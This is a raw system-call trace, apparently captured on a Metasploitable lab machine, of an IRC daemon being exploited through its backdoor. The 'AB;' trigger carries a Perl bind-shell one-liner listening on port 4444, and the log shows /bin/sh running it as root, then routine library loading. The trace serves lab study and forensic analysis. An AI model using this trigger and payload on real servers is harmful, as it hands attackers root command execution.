4519  07:20:33.278804 select(1024, [2 3 4 7 9], [], NULL, {0, 920000}) = 1 (in [2], left {0, 760000})

4519  07:20:33.439854 clock_gettime(CLOCK_MONOTONIC, {1643, 256875319}) = 0

4519  07:20:33.439876 accept(2, 0, NULL) = 5

4519  07:20:33.439896 getpeername(5, {sa_family=AF_INET, sin_port=htons(43375), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:20:33.439928 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:20:33.439940 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:20:33.439953 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:20:33.439966 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:20:33.439977 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:20:33.439988 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:20:33.440002 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:20:33.440018 clock_gettime(CLOCK_MONOTONIC, {1643, 257031946}) = 0

4519  07:20:33.440030 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:20:33.440042 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:20:33.440051 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:20:33.440061 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:20:33.440071 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:20:33.440087 send(6, "\266`\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:20:33.440276 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:20:33.440335 gettimeofday({1495624833, 440339}, NULL) = 0

4519  07:20:33.440348 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:20:33.445497 clock_gettime(CLOCK_MONOTONIC, {1643, 262527390}) = 0

4519  07:20:33.445528 recvfrom(6, "\266`\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\206\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:20:33.445569 close(6)          = 0

4519  07:20:33.445584 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:20:33.445599 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:20:33.445658 time(NULL)        = 1495624833

4519  07:20:33.445670 time(NULL)        = 1495624833

4519  07:20:33.445682 gettimeofday({1495624833, 445686}, NULL) = 0

4519  07:20:33.445694 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:20:33.445723 clock_gettime(CLOCK_MONOTONIC, {1643, 262735576}) = 0

4519  07:20:33.445733 gettimeofday({1495624833, 445736}, NULL) = 0

4519  07:20:33.445743 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 810000})

4519  07:20:33.626558 clock_gettime(CLOCK_MONOTONIC, {1643, 443567603}) = 0

4519  07:20:33.626559 recv(9, "PRIVMSG  #testit3 BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 59

4519  07:20:33.626559 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626559 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626559 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626560 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626561 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626576 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626590 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626604 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626617 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626630 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626652 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626667 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626680 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626694 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626707 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626721 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626734 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626747 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626790 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626807 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626837 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626850 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 240000}, ...}) = 0

4519  07:20:33.626868 gettimeofday({1495624833, 626871}, NULL) = 0

4519  07:20:33.626879 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:20:33.626920 clock_gettime(CLOCK_MONOTONIC, {1643, 443933208}) = 0

4519  07:20:33.626932 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:20:33.626964 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:20:33.626983 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:20:33.626996 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:20:33.627010 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 7828

7828  07:20:33.627158 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

7828  07:20:33.627172 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

7828  07:20:33.627183 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7828  07:20:33.627196 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

7828  07:20:33.627311 brk(0)            = 0x80f9000

7828  07:20:33.627333 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7828  07:20:33.627350 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc4000

7828  07:20:33.627366 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7828  07:20:33.627383 open("/etc/ld.so.cache", O_RDONLY) = 1

7828  07:20:33.627395 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7828  07:20:33.627414 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fbc000

7828  07:20:33.627425 close(1)          = 0

7828  07:20:33.627436 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7828  07:20:33.627451 open("/lib/libncurses.so.5", O_RDONLY) = 1

7828  07:20:33.627464 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

7828  07:20:33.627602 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

7828  07:20:33.627620 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f8c000

7828  07:20:33.627632 mmap2(0xb7fb9000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7fb9000

7828  07:20:33.627648 close(1)          = 0

7828  07:20:33.627661 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7828  07:20:33.627675 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7828  07:20:33.627689 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7828  07:20:33.627824 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7828  07:20:33.627842 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f88000

7828  07:20:33.627854 mmap2(0xb7f8a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f8a000

7828  07:20:33.627870 close(1)          = 0

7828  07:20:33.627881 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7828  07:20:33.627894 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7828  07:20:33.627908 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7828  07:20:33.627997 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7828  07:20:33.628013 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f87000

7828  07:20:33.628027 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e38000

7828  07:20:33.628041 mmap2(0xb7f81000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f81000

7828  07:20:33.628056 mmap2(0xb7f84000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f84000

7828  07:20:33.628070 close(1)          = 0

7828  07:20:33.628092 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e37000

7828  07:20:33.628103 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e376b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7828  07:20:33.628159 mprotect(0xb7f81000, 4096, PROT_READ) = 0

7828  07:20:33.628196 munmap(0xb7fbc000, 29913) = 0

7828  07:20:33.628224 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7828  07:20:33.628238 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

7828  07:20:33.628285 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf85ca20) = -1 ENOTTY (Inappropriate ioctl for device)

7828  07:20:33.628335 brk(0)            = 0x80f9000

7828  07:20:33.628345 brk(0x80fa000)    = 0x80fa000

7828  07:20:33.628357 brk(0x80fb000)    = 0x80fb000

7828  07:20:33.628373 getuid32()        = 0

7828  07:20:33.628382 getgid32()        = 0

7828  07:20:33.628391 geteuid32()       = 0

7828  07:20:33.628400 getegid32()       = 0

7828  07:20:33.628414 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7828  07:20:33.628427 time(NULL)        = 1495624833

7828  07:20:33.628440 brk(0x80fc000)    = 0x80fc000

7828  07:20:33.628455 brk(0x80fd000)    = 0x80fd000

7828  07:20:33.628474 open("/proc/meminfo", O_RDONLY) = 1

7828  07:20:33.628496 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

7828  07:20:33.628514 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc3000

7828  07:20:33.628525 read(1, "MemTotal:      1035240 kB\nMemFree:        539632 kB\nBuffers:         65036 kB\nCached:         273380 kB\nSwapCached:          0 kB\nActive:         254384 kB\nInactive:       212948 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        539392 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            5116 kB\nWriteback:           0 kB\nAnonPages:      128980 kB\nMapped:          52008 kB\nSlab:            16864 kB\nSReclaimable:     8636 kB\nSUnreclaim:       8228 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

7828  07:20:33.628609 close(1)          = 0

7828  07:20:33.628620 munmap(0xb7fc3000, 4096) = 0

7828  07:20:33.628631 brk(0x80fe000)    = 0x80fe000

7828  07:20:33.628657 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7828  07:20:33.628671 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7828  07:20:33.628683 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7828  07:20:33.628694 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7828  07:20:33.628706 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

7828  07:20:33.628718 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

7828  07:20:33.628731 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7828  07:20:33.628743 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7828  07:20:33.629487 uname({sys="Linux", node="metasploitable", ...}) = 0

7828  07:20:33.629538 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

7828  07:20:33.629557 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7828  07:20:33.629575 brk(0x8100000)    = 0x8100000

7828  07:20:33.629587 getcwd("/etc/unreal", 4096) = 12

7828  07:20:33.629601 getpid()          = 7828

7828  07:20:33.629617 getppid()         = 4519

7828  07:20:33.629633 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7828  07:20:33.629653 stat64("/sbin/sh", 0xbf85c9f8) = -1 ENOENT (No such file or directory)

7828  07:20:33.629669 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7828  07:20:33.629687 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7828  07:20:33.629710 socket(PF_FILE, SOCK_STREAM, 0) = 1

7828  07:20:33.629729 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7828  07:20:33.629742 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7828  07:20:33.629764 close(1)          = 0

7828  07:20:33.629775 socket(PF_FILE, SOCK_STREAM, 0) = 1

7828  07:20:33.629785 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7828  07:20:33.629795 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7828  07:20:33.629813 close(1)          = 0

7828  07:20:33.629826 open("/etc/nsswitch.conf", O_RDONLY) = 1

7828  07:20:33.629841 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

7828  07:20:33.629857 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc3000

7828  07:20:33.629868 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

7828  07:20:33.629918 read(1, "", 4096) = 0

7828  07:20:33.630033 close(1)          = 0

7828  07:20:33.630060 munmap(0xb7fc3000, 4096) = 0

7828  07:20:33.630083 open("/etc/ld.so.cache", O_RDONLY) = 1

7828  07:20:33.630098 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7828  07:20:33.630115 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fbc000

7828  07:20:33.630126 close(1)          = 0

7828  07:20:33.630151 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7828  07:20:33.630165 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

7828  07:20:33.630180 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

7828  07:20:33.630270 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

7828  07:20:33.630288 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e2e000

7828  07:20:33.630300 mmap2(0xb7e35000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e35000

7828  07:20:33.630317 close(1)          = 0

7828  07:20:33.630329 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7828  07:20:33.630342 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

7828  07:20:33.630356 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

7828  07:20:33.630447 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

7828  07:20:33.630465 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e16000

7828  07:20:33.630477 mmap2(0xb7e2a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e2a000

7828  07:20:33.630492 mmap2(0xb7e2c000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e2c000

7828  07:20:33.630579 close(1)          = 0

7828  07:20:33.630625 munmap(0xb7fbc000, 29913) = 0

